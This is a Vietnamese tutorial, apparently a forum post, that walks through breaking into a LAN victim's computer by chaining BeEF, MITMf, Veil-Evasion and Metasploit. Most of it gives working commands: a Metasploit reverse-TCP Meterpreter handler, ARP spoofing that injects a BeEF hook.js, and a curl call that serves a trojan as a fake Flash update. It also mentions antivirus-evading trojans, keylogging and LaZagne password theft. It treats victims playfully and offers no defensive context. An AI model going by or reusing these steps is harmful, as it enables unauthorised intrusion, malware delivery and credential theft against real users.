Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit
Ý tưởng: Beef + Mitmf + Veil Evasion + Metasploit.
Beef: Sử dụng để upload file chứa trojan mà Veil Evasion tạo ra đến máy tính nạn nhân qua trình duyệt web
Mitmf có nhiệm vụ tiêm hook.js đến một website bất kỳ khi nạn nhân mở bất kỳ một website nào mới.
Mitmf còn có thể tiêm một file trojan bất kỳ vào máy tính nạn nhân khi nạn nhân download một file .zip về máy mà không hề hay biêt file .zip đấy đã bị nhiễm trojan.
Mitmf còn có thể gi lại thao tác bàn phím trên máy tính nạn nhân khi truy cập trình duyệt web qua jskeylogger
Veil Evasion: tạo một trojan vượt qua tất cả các phần mềm diệt virus mà không bị phát hiện chạy ngầm trong máy tính của nạn nhân. tạo trojan với IP và PORT của máy tính hacker.
Metasploit. Luôn luông lắng nghe ở IP và PORT của hacker khi nạn nhân mở file có chứa trojan thì hacker sẽ đột nhập vào máy tính nạn nhân và toàn quyền kiểm soát. Bằng việc sử dụng các command trong Metasploit. Loạt bài sau tôi sẽ hướng dẫn các bạn sử dụng Metasploit Untimate. Để tăng tinh vui nhộn và đặc sắc thì có thể kết hợp thêm Lazagne để lấy thông tin user and password mà nạn nhân đã lưu trên trình duyệt web. ===> tự tuy duy thêm
Chuần bị:
https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion
OS: Kali Linux.
Thực hiện:
1. Config Beef.
cd /usr/share/beef-xss/extensions/metasploit.
vi config.yaml
host: “192.168.1.12”
callback_host: “192.168.1.12”
{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}
cd /usr/share/beef-xss
vi config.yaml
metasploit:
enable: true
Chạy Beef ./beef
Vào trình duyệt gõ địa chỉ sau UI URL: http://192.168.1.12:3000/ui/panel user and pass default: beef and beef
./Veil-Evasion.py
Chạy Metasploit.
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler…
Chạy Mitmf.
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.18 –inject –js-url http://192.168.1.12:3000/hook.js
Để tăng cuộc chơi thêm vui vẻ và thú vị hơn tôi đã tìm kiến trên internet một bài nhạc mang phong cách đặc trưng của hacker và sẽ phát trên máy tính nạn nhân thông qua Beef. khi tôi thực hiện điều này máy tính của nạn nhất sẽ tự động phát nhạc mà không có bất kì dấu hiệu nào.
copy bài nhạc vào đây.
/usr/share/beef-xss/extensions/demos/html
copy trojan tạo ra vào đây.
/usr/share/beef-xss/extensions/social_engineering/droppers
/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper
Ý tương tiếp theo tôi sẽ đầy trojan lên máy tính nạn nhân qua Beef bằng tính năng Fake Flash Updae trong Social Engineering.
Đề làm được việc này bạn cần chạy đoạn mã sau:
curl -H “Content-Type: application/json; charset=UTF-8” -d'{“mount”:”/flashplayer.exe”, “local_file”:”/extensions/social_engineering/droppers/flashplayer.exe”}’ -X POST 192.168.1.12.132/api/server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051c c
==> tôi không giải thích ở đây các bạn phải tự ngiên cứu thêm.
Mở nhạc hacker trên máy tính nạn nhân cho nạn nhân thư giãn tí 
Kết thúc chúng ta đột nhập thành công vào máy tính nạn nhân và còn mở nhạc cho nạn nhân nghe. còn rất nhiều kỹ thuật nữa trong bài này tôi không public vì tính chất nguy hiểm của nó. mọi người tự nghiên cứu và tư duy thêm 
(hackersutudent93 và nguồn từ Whitehat.vn)
